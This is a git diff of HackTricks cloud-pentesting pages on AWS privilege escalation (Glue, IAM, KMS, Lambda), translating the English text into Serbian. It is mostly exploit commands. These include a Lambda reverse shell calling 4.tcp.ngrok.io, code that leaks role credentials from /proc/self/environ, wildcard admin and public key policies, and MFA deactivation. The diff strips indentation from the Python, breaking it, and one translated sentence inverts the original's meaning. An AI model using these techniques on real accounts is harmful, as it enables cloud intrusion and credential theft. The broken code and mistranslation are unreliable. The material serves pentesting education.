 # Get the public address of the instance
 ## You could also use get-dev-endpoints
@@ -44,13 +41,11 @@ aws glue get-dev-endpoint --endpoint-name privesctest
 # SSH with the glue user
 ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com
 ```
-
-**Potential Impact:** Privesc to the glue service role used.
+**Potencijalni Uticaj:** Privesc na ulogu servisa glue koja se koristi.
 
 ### `iam:PassRole`, (`glue:CreateJob` | `glue:UpdateJob`), (`glue:StartJobRun` | `glue:CreateTrigger`)
 
-Users with **`iam:PassRole`** combined with either **`glue:CreateJob` or `glue:UpdateJob`**, and either **`glue:StartJobRun` or `glue:CreateTrigger`** can **create or update an AWS Glue job**, attaching any **Glue service account**, and initiate the job's execution. The job's capabilities include running arbitrary Python code, which can be exploited to establish a reverse shell. This reverse shell can then be utilized to exfiltrate the **IAM credential**s of the role attached to the Glue job, leading to potential unauthorized access or actions based on the permissions of that role:
-
+Korisnici sa **`iam:PassRole`** u kombinaciji sa bilo kojim od **`glue:CreateJob` ili `glue:UpdateJob`**, i bilo kojim od **`glue:StartJobRun` ili `glue:CreateTrigger`** mogu **napraviti ili ažurirati AWS Glue posao**, pridružujući bilo koji **Glue servisni nalog**, i pokrenuti izvršenje posla. Mogućnosti posla uključuju izvršavanje proizvoljnog Python koda, što se može iskoristiti za uspostavljanje reverzibilne ljuske. Ova reverzibilna ljuska se zatim može koristiti za eksfiltraciju **IAM kredencijala** uloge pridružene Glue poslu, što može dovesti do potencijalnog neovlašćenog pristupa ili radnji na osnovu dozvola te uloge:
 ```bash
 # Content of the python script saved in s3:
 #import socket,subprocess,os
@@ -65,32 +60,27 @@ Users with **`iam:PassRole`** combined with either **`glue:CreateJob` or `glue:U
 
 # A Glue role with admin access was created
 aws glue create-job \
-    --name privesctest \
-    --role arn:aws:iam::93424712358:role/GlueAdmin \
-    --command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'
+--name privesctest \
+--role arn:aws:iam::93424712358:role/GlueAdmin \
+--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'
 
 # You can directly start the job
 aws glue start-job-run --job-name privesctest
 # Or you can create a trigger to start it
 aws glue create-trigger --name triggerprivesc --type SCHEDULED \
-    --actions '[{"JobName": "privesctest"}]' --start-on-creation \
-    --schedule "0/5 * * * * *"  #Every 5mins, feel free to change
+--actions '[{"JobName": "privesctest"}]' --start-on-creation \
+--schedule "0/5 * * * * *"  #Every 5mins, feel free to change
 ```
-
-**Potential Impact:** Privesc to the glue service role specified.
+**Potencijalni Uticaj:** Privesc na ulogu servisa glue koja je specificirana.
 
 ### `glue:UpdateJob`
 
-Just with the update permission an attacked could steal the IAM Credentials of the already attached role.
+Samo sa dozvolom za ažuriranje, napadač bi mogao da ukrade IAM kredencijale već prikačene uloge.
 
-**Potential Impact:** Privesc to the glue service role attached.
+**Potencijalni Uticaj:** Privesc na ulogu servisa glue koja je prikačena.
 
-## References
+## Reference
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md
index 7807f6152..f23d194b8 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md
@@ -4,7 +4,7 @@
 
 ## IAM
 
-For more info about IAM check:
+Za više informacija o IAM-u pogledajte:
 
 {{#ref}}
 ../aws-services/aws-iam-enum.md
@@ -12,228 +12,189 @@ For more info about IAM check:
 
 ### **`iam:CreatePolicyVersion`**
 
-Grants the ability to create a new IAM policy version, bypassing the need for `iam:SetDefaultPolicyVersion` permission by using the `--set-as-default` flag. This enables defining custom permissions.
+Daje mogućnost kreiranja nove verzije IAM politike, zaobilazeći potrebu za `iam:SetDefaultPolicyVersion` dozvolom korišćenjem `--set-as-default` oznake. Ovo omogućava definisanje prilagođenih dozvola.
 
 **Exploit Command:**
-
 ```bash
 aws iam create-policy-version --policy-arn  \
-    --policy-document file:///path/to/administrator/policy.json --set-as-default
+--policy-document file:///path/to/administrator/policy.json --set-as-default
 ```
-
-**Impact:** Directly escalates privileges by allowing any action on any resource.
+**Uticaj:** Direktno escalira privilegije omogućavajući bilo koju akciju na bilo kojem resursu.
 
 ### **`iam:SetDefaultPolicyVersion`**
 
-Allows changing the default version of an IAM policy to another existing version, potentially escalating privileges if the new version has more permissions.
-
-**Bash Command:**
+Omogućava promenu podrazumevane verzije IAM politike na drugu postojeću verziju, potencijalno escalirajući privilegije ako nova verzija ima više dozvola.
 
+**Bash Komanda:**
 ```bash
 aws iam set-default-policy-version --policy-arn  --version-id v2
 ```
-
-**Impact:** Indirect privilege escalation by enabling more permissions.
+**Uticaj:** Indirektno povećanje privilegija omogućavanjem više dozvola.
 
 ### **`iam:CreateAccessKey`**
 
-Enables creating access key ID and secret access key for another user, leading to potential privilege escalation.
-
-**Exploit:**
+Omogućava kreiranje ID-a pristupnog ključa i tajnog pristupnog ključa za drugog korisnika, što može dovesti do potencijalnog povećanja privilegija.
 
+**Eksploatacija:**
 ```bash
 aws iam create-access-key --user-name 
 ```
-
-**Impact:** Direct privilege escalation by assuming another user's extended permissions.
+**Uticaj:** Direktno povećanje privilegija preuzimanjem proširenih dozvola drugog korisnika.
 
 ### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`**
 
-Permits creating or updating a login profile, including setting passwords for AWS console login, leading to direct privilege escalation.
-
-**Exploit for Creation:**
+Omogućava kreiranje ili ažuriranje profila za prijavu, uključujući postavljanje lozinki za prijavu na AWS konzolu, što dovodi do direktnog povećanja privilegija.
 
+**Eksploatacija za kreiranje:**
 ```bash
 aws iam create-login-profile --user-name target_user --no-password-reset-required \
-    --password ''
+--password ''
 ```
-
-**Exploit for Update:**
-
+**Eksploatacija za ažuriranje:**
 ```bash
 aws iam update-login-profile --user-name target_user --no-password-reset-required \
-    --password ''
+--password ''
 ```
-
-**Impact:** Direct privilege escalation by logging in as "any" user.
+**Uticaj:** Direktno povećanje privilegija prijavljivanjem kao "bilo koji" korisnik.
 
 ### **`iam:UpdateAccessKey`**
 
-Allows enabling a disabled access key, potentially leading to unauthorized access if the attacker possesses the disabled key.
-
-**Exploit:**
+Omogućava aktiviranje onemogućenog pristupnog ključa, što može dovesti do neovlašćenog pristupa ako napadač poseduje onemogućeni ključ.
 
+**Eksploatacija:**
 ```bash
 aws iam update-access-key --access-key-id  --status Active --user-name 
 ```
-
-**Impact:** Direct privilege escalation by reactivating access keys.
+**Uticaj:** Direktno povećanje privilegija ponovnim aktiviranjem pristupnih ključeva.
 
 ### **`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`**
 
-Enables generating or resetting credentials for specific AWS services (e.g., CodeCommit, Amazon Keyspaces), inheriting the permissions of the associated user.
-
-**Exploit for Creation:**
+Omogućava generisanje ili resetovanje kredencijala za specifične AWS usluge (npr. CodeCommit, Amazon Keyspaces), nasleđujući dozvole povezanog korisnika.
 
+**Eksploatacija za kreiranje:**
 ```bash
 aws iam create-service-specific-credential --user-name  --service-name 
 ```
-
-**Exploit for Reset:**
-
+**Eksploatacija za resetovanje:**
 ```bash
 aws iam reset-service-specific-credential --service-specific-credential-id 
 ```
-
-**Impact:** Direct privilege escalation within the user's service permissions.
+**Uticaj:** Direktno eskaliranje privilegija unutar dozvola usluge korisnika.
 
 ### **`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`**
 
-Allows attaching policies to users or groups, directly escalating privileges by inheriting the permissions of the attached policy.
-
-**Exploit for User:**
+Omogućava pridruživanje politika korisnicima ili grupama, direktno eskalirajući privilegije nasleđivanjem dozvola pridružene politike.
 
+**Eksploatacija za korisnika:**
 ```bash
 aws iam attach-user-policy --user-name  --policy-arn ""
 ```
-
-**Exploit for Group:**
-
+**Eksploatacija za Grupu:**
 ```bash
 aws iam attach-group-policy --group-name  --policy-arn ""
 ```
-
-**Impact:** Direct privilege escalation to anything the policy grants.
+**Uticaj:** Direktno povećanje privilegija na sve što politika odobrava.
 
 ### **`iam:AttachRolePolicy`,** ( `sts:AssumeRole`|`iam:createrole`) | **`iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`**
 
-Permits attaching or putting policies to roles, users, or groups, enabling direct privilege escalation by granting additional permissions.
-
-**Exploit for Role:**
+Omogućava pridruživanje ili postavljanje politika na uloge, korisnike ili grupe, omogućavajući direktno povećanje privilegija dodeljivanjem dodatnih dozvola.
 
+**Iskorišćavanje za Ulogu:**
 ```bash
 aws iam attach-role-policy --role-name  --policy-arn ""
 ```
-
-**Exploit for Inline Policies:**
-
+**Eksploatacija za Inline Politike:**
 ```bash
 aws iam put-user-policy --user-name  --policy-name "" \
-    --policy-document "file:///path/to/policy.json"
+--policy-document "file:///path/to/policy.json"
 
 aws iam put-group-policy --group-name  --policy-name "" \
-    --policy-document file:///path/to/policy.json
+--policy-document file:///path/to/policy.json
 
 aws iam put-role-policy --role-name  --policy-name "" \
-    --policy-document file:///path/to/policy.json
+--policy-document file:///path/to/policy.json
 ```
-
-You can use a policy like:
-
+Možete koristiti politiku kao:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Action": ["*"],
-      "Resource": ["*"]
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": ["*"],
+"Resource": ["*"]
+}
+]
 }
 ```
-
-**Impact:** Direct privilege escalation by adding permissions through policies.
+**Uticaj:** Direktno eskaliranje privilegija dodavanjem dozvola putem politika.
 
 ### **`iam:AddUserToGroup`**
 
-Enables adding oneself to an IAM group, escalating privileges by inheriting the group's permissions.
-
-**Exploit:**
+Omogućava dodavanje sebe u IAM grupu, eskalirajući privilegije nasleđivanjem dozvola grupe.
 
+**Eksploatacija:**
 ```bash
 aws iam add-user-to-group --group-name  --user-name 
 ```
-
-**Impact:** Direct privilege escalation to the level of the group's permissions.
+**Uticaj:** Direktno povećanje privilegija na nivo dozvola grupe.
 
 ### **`iam:UpdateAssumeRolePolicy`**
 
-Allows altering the assume role policy document of a role, enabling the assumption of the role and its associated permissions.
-
-**Exploit:**
+Omogućava izmene dokumenta politike pretpostavljanja uloge, omogućavajući pretpostavljanje uloge i njenih povezanih dozvola.
 
+**Eksploatacija:**
 ```bash
 aws iam update-assume-role-policy --role-name  \
-    --policy-document file:///path/to/assume/role/policy.json
+--policy-document file:///path/to/assume/role/policy.json
 ```
-
-Where the policy looks like the following, which gives the user permission to assume the role:
-
+Gde politika izgleda ovako, što korisniku daje dozvolu da preuzme ulogu:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Action": "sts:AssumeRole",
-      "Principal": {
-        "AWS": "$USER_ARN"
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": "sts:AssumeRole",
+"Principal": {
+"AWS": "$USER_ARN"
+}
+}
+]
 }
 ```
-
-**Impact:** Direct privilege escalation by assuming any role's permissions.
+**Uticaj:** Direktno povećanje privilegija preuzimanjem dozvola bilo koje uloge.
 
 ### **`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`**
 
-Permits uploading an SSH public key for authenticating to CodeCommit and deactivating MFA devices, leading to potential indirect privilege escalation.
-
-**Exploit for SSH Key Upload:**
+Omogućava učitavanje SSH javnog ključa za autentifikaciju na CodeCommit i deaktiviranje MFA uređaja, što može dovesti do potencijalnog indirektnog povećanja privilegija.
 
+**Eksploatacija za učitavanje SSH ključa:**
 ```bash
 aws iam upload-ssh-public-key --user-name  --ssh-public-key-body 
 ```
-
-**Exploit for MFA Deactivation:**
-
+**Eksploatacija za deaktivaciju MFA:**
 ```bash
 aws iam deactivate-mfa-device --user-name  --serial-number 
 ```
-
-**Impact:** Indirect privilege escalation by enabling CodeCommit access or disabling MFA protection.
+**Uticaj:** Indirektno eskaliranje privilegija omogućavanjem pristupa CodeCommit-u ili onemogućavanjem MFA zaštite.
 
 ### **`iam:ResyncMFADevice`**
 
-Allows resynchronization of an MFA device, potentially leading to indirect privilege escalation by manipulating MFA protection.
-
-**Bash Command:**
+Omogućava resinkronizaciju MFA uređaja, što može dovesti do indirektnog eskaliranja privilegija manipulacijom MFA zaštite.
 
+**Bash Komanda:**
 ```bash
 aws iam resync-mfa-device --user-name  --serial-number  \
-    --authentication-code1  --authentication-code2 
+--authentication-code1  --authentication-code2 
 ```
-
-**Impact:** Indirect privilege escalation by adding or manipulating MFA devices.
+**Uticaj:** Indirektno eskaliranje privilegija dodavanjem ili manipulisanjem MFA uređaja.
 
 ### `iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`)
 
-With these permissions you can **change the XML metadata of the SAML connection**. Then, you could abuse the **SAML federation** to **login** with any **role that is trusting** it.
-
-Note that doing this **legit users won't be able to login**. However, you could get the XML, so you can put yours, login and configure the previous back
+Sa ovim dozvolama možete **promeniti XML metapodatke SAML veze**. Tada biste mogli zloupotrebiti **SAML federaciju** da se **prijavite** sa bilo kojom **ulogom koja joj veruje**.
 
+Imajte na umu da će **legitimni korisnici moći da se prijave**. Međutim, mogli biste dobiti XML, tako da možete staviti svoj, prijaviti se i konfigurisati prethodni nazad.
 ```bash
 # List SAMLs
 aws iam list-saml-providers
@@ -249,14 +210,12 @@ aws iam update-saml-provider --saml-metadata-document  --saml-provider-ar
 # Optional: Set the previous XML back
 aws iam update-saml-provider --saml-metadata-document  --saml-provider-arn 
 ```
-
 > [!NOTE]
-> TODO: A Tool capable of generating the SAML metadata and login with a specified role
+> TODO: Alat sposoban za generisanje SAML metapodataka i prijavu sa određenom ulogom
 
 ### `iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:`**`GetOpenIDConnectProvider`**)
 
-(Unsure about this) If an attacker has these **permissions** he could add a new **Thumbprint** to manage to login in all the roles trusting the provider.
-
+(Nesigurno u vezi s tim) Ako napadač ima ove **dozvole**, mogao bi dodati novi **Thumbprint** kako bi uspeo da se prijavi u sve uloge koje veruju provajderu.
 ```bash
 # List providers
 aws iam list-open-id-connect-providers
@@ -265,13 +224,8 @@ aws iam get-open-id-connect-provider --open-id-connect-provider-arn 
 # Update Thumbprints (The thumbprint is always a 40-character string)
 aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn  --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3
 ```
-
 ## References
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md
index 02c05b76d..683c3308f 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md
@@ -4,7 +4,7 @@
 
 ## KMS
 
-For more info about KMS check:
+Za više informacija o KMS pogledajte:
 
 {{#ref}}
 ../aws-services/aws-kms-enum.md
@@ -12,8 +12,7 @@ For more info about KMS check:
 
 ### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`)
 
-With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone:
-
+Sa ovim dozvolama je moguće **modifikovati dozvole pristupa ključa** tako da ga mogu koristiti drugi nalozi ili čak bilo ko:
 ```bash
 aws kms list-keys
 aws kms list-key-policies --key-id  # Although only 1 max per key
@@ -21,106 +20,91 @@ aws kms get-key-policy --key-id  --policy-name 
 # AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
 aws kms put-key-policy --key-id  --policy-name  --policy file:///tmp/policy.json
 ```
-
 policy.json:
-
 ```json
 {
-  "Version": "2012-10-17",
-  "Id": "key-consolepolicy-3",
-  "Statement": [
-    {
-      "Sid": "Enable IAM User Permissions",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam:::root"
-      },
-      "Action": "kms:*",
-      "Resource": "*"
-    },
-    {
-      "Sid": "Allow all use",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam:::root"
-      },
-      "Action": ["kms:*"],
-      "Resource": "*"
-    }
-  ]
+"Version": "2012-10-17",
+"Id": "key-consolepolicy-3",
+"Statement": [
+{
+"Sid": "Enable IAM User Permissions",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam:::root"
+},
+"Action": "kms:*",
+"Resource": "*"
+},
+{
+"Sid": "Allow all use",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam:::root"
+},
+"Action": ["kms:*"],
+"Resource": "*"
+}
+]
 }
 ```
-
 ### `kms:CreateGrant`
 
-It **allows a principal to use a KMS key:**
-
+Omogućava **principal-u da koristi KMS ključ:**
 ```bash
 aws kms create-grant \
-    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
-    --grantee-principal arn:aws:iam::123456789012:user/exampleUser \
-    --operations Decrypt
+--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
+--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
+--operations Decrypt
 ```
+> [!WARNING]
+> Grant može dozvoliti samo određene vrste operacija: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
 
 > [!WARNING]
-> A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
-
-> [!WARNING]
-> Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. Once that time has passed, the principal can use the KMS key without needing to specify anything.\
-> However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\
-> For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token).
-
+> Imajte na umu da može proći nekoliko minuta da KMS **dozvoli korisniku da koristi ključ nakon što je grant generisan**. Kada to vreme prođe, glavni korisnik može koristiti KMS ključ bez potrebe da bilo šta specificira.\
+> Međutim, ako je potrebno odmah koristiti grant [koristite grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (proverite sledeći kod).\
+> Za [**više informacija pročitajte ovo**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token).
 ```bash
 # Use the grant token in a request
 aws kms generate-data-key \
-    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
-    –-key-spec AES_256 \
-    --grant-tokens $token
+--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
+–-key-spec AES_256 \
+--grant-tokens $token
 ```
-
-Note that it's possible to list grant of keys with:
-
+Napomena da je moguće nabrojati dodeljivanje ključeva sa:
 ```bash
 aws kms list-grants --key-id 
 ```
-
 ### `kms:CreateKey`, `kms:ReplicateKey`
 
-With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy.
-
-So, an attacker could abuse this to obtain privesc his access to the key and use it
+Sa ovim dozvolama moguće je replicirati KMS ključ omogućen za više regiona u drugom regionu sa drugom politikom.
 
+Dakle, napadač bi mogao da iskoristi ovo da dobije privesc svoj pristup ključa i koristi ga.
 ```bash
 aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml
 
 {
-    "Version": "2012-10-17",
-    "Id": "key-consolepolicy-3",
-    "Statement": [
-        {
-            "Sid": "Enable IAM User Permissions",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "*"
-            },
-            "Action": "kms:*",
-            "Resource": "*"
-        }
-    ]
+"Version": "2012-10-17",
+"Id": "key-consolepolicy-3",
+"Statement": [
+{
+"Sid": "Enable IAM User Permissions",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "kms:*",
+"Resource": "*"
+}
+]
 }
 ```
-
 ### `kms:Decrypt`
 
-This permission allows to use a key to decrypt some information.\
-For more information check:
+Ova dozvola omogućava korišćenje ključa za dešifrovanje nekih informacija.\
+Za više informacija proverite:
 
 {{#ref}}
 ../aws-post-exploitation/aws-kms-post-exploitation.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md
index d276ef737..7c9d8c302 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md
@@ -4,7 +4,7 @@
 
 ## lambda
 
-More info about lambda in:
+Više informacija o lambda u:
 
 {{#ref}}
 ../aws-services/aws-lambda-enum.md
@@ -12,23 +12,22 @@ More info about lambda in:
 
 ### `iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`)
 
-Users with the **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:InvokeFunction`** permissions can escalate their privileges.\
-They can **create a new Lambda function and assign it an existing IAM role**, granting the function the permissions associated with that role. The user can then **write and upload code to this Lambda function (with a rev shell for example)**.\
-Once the function is set up, the user can **trigger its execution** and the intended actions by invoking the Lambda function through the AWS API. This approach effectively allows the user to perform tasks indirectly through the Lambda function, operating with the level of access granted to the IAM role associated with it.\\
-
-A attacker could abuse this to get a **rev shell and steal the token**:
+Korisnici sa **`iam:PassRole`, `lambda:CreateFunction`, i `lambda:InvokeFunction`** dozvolama mogu da eskaliraju svoje privilegije.\
+Mogu **napraviti novu Lambda funkciju i dodeliti joj postojeću IAM ulogu**, dajući funkciji dozvole povezane sa tom ulogom. Korisnik može zatim **napisati i otpremiti kod u ovu Lambda funkciju (sa rev shell-om na primer)**.\
+Kada je funkcija postavljena, korisnik može **pokrenuti njeno izvršavanje** i nameravane akcije pozivajući Lambda funkciju putem AWS API-ja. Ovaj pristup efikasno omogućava korisniku da izvršava zadatke indirektno kroz Lambda funkciju, delujući sa nivoom pristupa koji je dodeljen IAM ulozi povezanoj sa njom.\\
 
+Napadač bi mogao da zloupotrebi ovo da dobije **rev shell i ukrade token**:
 ```python:rev.py
 import socket,subprocess,os,time
 def lambda_handler(event, context):
-   s = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
-   s.connect(('4.tcp.ngrok.io',14305))
-   os.dup2(s.fileno(),0)
-   os.dup2(s.fileno(),1)
-   os.dup2(s.fileno(),2)
-   p=subprocess.call(['/bin/sh','-i'])
-   time.sleep(900)
-   return 0
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
+s.connect(('4.tcp.ngrok.io',14305))
+os.dup2(s.fileno(),0)
+os.dup2(s.fileno(),1)
+os.dup2(s.fileno(),2)
+p=subprocess.call(['/bin/sh','-i'])
+time.sleep(900)
+return 0
 ```
 
 ```bash
@@ -37,8 +36,8 @@ zip "rev.zip" "rev.py"
 
 # Create the function
 aws lambda create-function --function-name my_function \
-    --runtime python3.9 --role  \
-    --handler rev.lambda_handler --zip-file fileb://rev.zip
+--runtime python3.9 --role  \
+--handler rev.lambda_handler --zip-file fileb://rev.zip
 
 # Invoke the function
 aws lambda invoke --function-name my_function output.txt
@@ -47,99 +46,83 @@ aws lambda invoke --function-name my_function output.txt
 # List roles
 aws iam list-attached-user-policies --user-name 
 ```
-
-You could also **abuse the lambda role permissions** from the lambda function itself.\
-If the lambda role had enough permissions you could use it to grant admin rights to you:
-
+Možete takođe **zloupotrebiti dozvole lambda uloge** iz same lambda funkcije.\
+Ako je lambda uloga imala dovoljno dozvola, mogli biste je iskoristiti da vam dodelite administratorska prava:
 ```python
 import boto3
 def lambda_handler(event, context):
-    client = boto3.client('iam')
-    response = client.attach_user_policy(
-        UserName='my_username',
-        PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
-    )
-    return response
+client = boto3.client('iam')
+response = client.attach_user_policy(
+UserName='my_username',
+PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
+)
+return response
 ```
-
-It is also possible to leak the lambda's role credentials without needing an external connection. This would be useful for **Network isolated Lambdas** used on internal tasks. If there are unknown security groups filtering your reverse shells, this piece of code will allow you to directly leak the credentials as the output of the lambda.
-
+Takođe je moguće iscuriti kredencijale uloge lambda bez potrebe za spoljnjom vezom. Ovo bi bilo korisno za **Network isolated Lambdas** korišćene za interne zadatke. Ako postoje nepoznate sigurnosne grupe koje filtriraju vaše obrnute ljuske, ovaj deo koda će vam omogućiti da direktno iscurite kredencijale kao izlaz lambda.
 ```python
 def handler(event, context):
-    sessiontoken = open('/proc/self/environ', "r").read()
-    return {
-        'statusCode': 200,
-        'session': str(sessiontoken)
-    }
+sessiontoken = open('/proc/self/environ', "r").read()
+return {
+'statusCode': 200,
+'session': str(sessiontoken)
+}
 ```
 
 ```bash
 aws lambda invoke --function-name  output.txt
 cat output.txt
 ```
-
-**Potential Impact:** Direct privesc to the arbitrary lambda service role specified.
+**Potencijalni Uticaj:** Direktno privesc na proizvoljnu lambda servisnu ulogu koja je navedena.
 
 > [!CAUTION]
-> Note that even if it might looks interesting **`lambda:InvokeAsync`** **doesn't** allow on it's own to **execute `aws lambda invoke-async`**, you also need `lambda:InvokeFunction`
+> Imajte na umu da čak i ako izgleda zanimljivo **`lambda:InvokeAsync`** **ne** omogućava samo po sebi da **izvršite `aws lambda invoke-async`**, takođe vam je potrebna `lambda:InvokeFunction`
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission`
 
-Like in the previous scenario, you can **grant yourself the `lambda:InvokeFunction`** permission if you have the permission **`lambda:AddPermission`**
-
+Kao u prethodnom scenariju, možete **dodeliti sebi dozvolu `lambda:InvokeFunction`** ako imate dozvolu **`lambda:AddPermission`**
 ```bash
 # Check the previous exploit and use the following line to grant you the invoke permissions
 aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \
-   --action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"
+--action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"
 ```
-
-**Potential Impact:** Direct privesc to the arbitrary lambda service role specified.
+**Potencijalni Uticaj:** Direktno privesc na proizvoljnu lambda servisnu ulogu koja je navedena.
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateEventSourceMapping`
 
-Users with **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:CreateEventSourceMapping`** permissions (and potentially `dynamodb:PutItem` and `dynamodb:CreateTable`) can indirectly **escalate privileges** even without `lambda:InvokeFunction`.\
-They can create a **Lambda function with malicious code and assign it an existing IAM role**.
-
-Instead of directly invoking the Lambda, the user sets up or utilizes an existing DynamoDB table, linking it to the Lambda through an event source mapping. This setup ensures the Lambda function is **triggered automatically upon a new item** entry in the table, either by the user's action or another process, thereby indirectly invoking the Lambda function and executing the code with the permissions of the passed IAM role.
+Korisnici sa **`iam:PassRole`, `lambda:CreateFunction`, i `lambda:CreateEventSourceMapping`** dozvolama (i potencijalno `dynamodb:PutItem` i `dynamodb:CreateTable`) mogu indirektno **escalirati privilegije** čak i bez `lambda:InvokeFunction`.\
+Mogu kreirati **Lambda funkciju sa zlonamernim kodom i dodeliti joj postojeću IAM ulogu**.
 
+Umesto da direktno pozivaju Lambda, korisnik postavlja ili koristi postojeću DynamoDB tabelu, povezujući je sa Lambdom putem mape izvora događaja. Ova postavka osigurava da se Lambda funkcija **automatski aktivira prilikom unosa novog stavke** u tabelu, bilo akcijom korisnika ili nekim drugim procesom, čime se indirektno poziva Lambda funkcija i izvršava kod sa dozvolama dodeljene IAM uloge.
 ```bash
 aws lambda create-function --function-name my_function \
-    --runtime python3.8 --role  \
-    --handler lambda_function.lambda_handler \
-    --zip-file fileb://rev.zip
+--runtime python3.8 --role  \
+--handler lambda_function.lambda_handler \
+--zip-file fileb://rev.zip
 ```
-
-If DynamoDB is already active in the AWS environment, the user only **needs to establish the event source mapping** for the Lambda function. However, if DynamoDB isn't in use, the user must **create a new table** with streaming enabled:
-
+Ako je DynamoDB već aktivan u AWS okruženju, korisnik samo **treba da uspostavi mapiranje izvora događaja** za Lambda funkciju. Međutim, ako se DynamoDB ne koristi, korisnik mora **da kreira novu tabelu** sa omogućenom striming funkcijom:
 ```bash
 aws dynamodb create-table --table-name my_table \
-    --attribute-definitions AttributeName=Test,AttributeType=S \
-    --key-schema AttributeName=Test,KeyType=HASH \
-    --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
-    --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES
+--attribute-definitions AttributeName=Test,AttributeType=S \
+--key-schema AttributeName=Test,KeyType=HASH \
+--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
+--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES
 ```
-
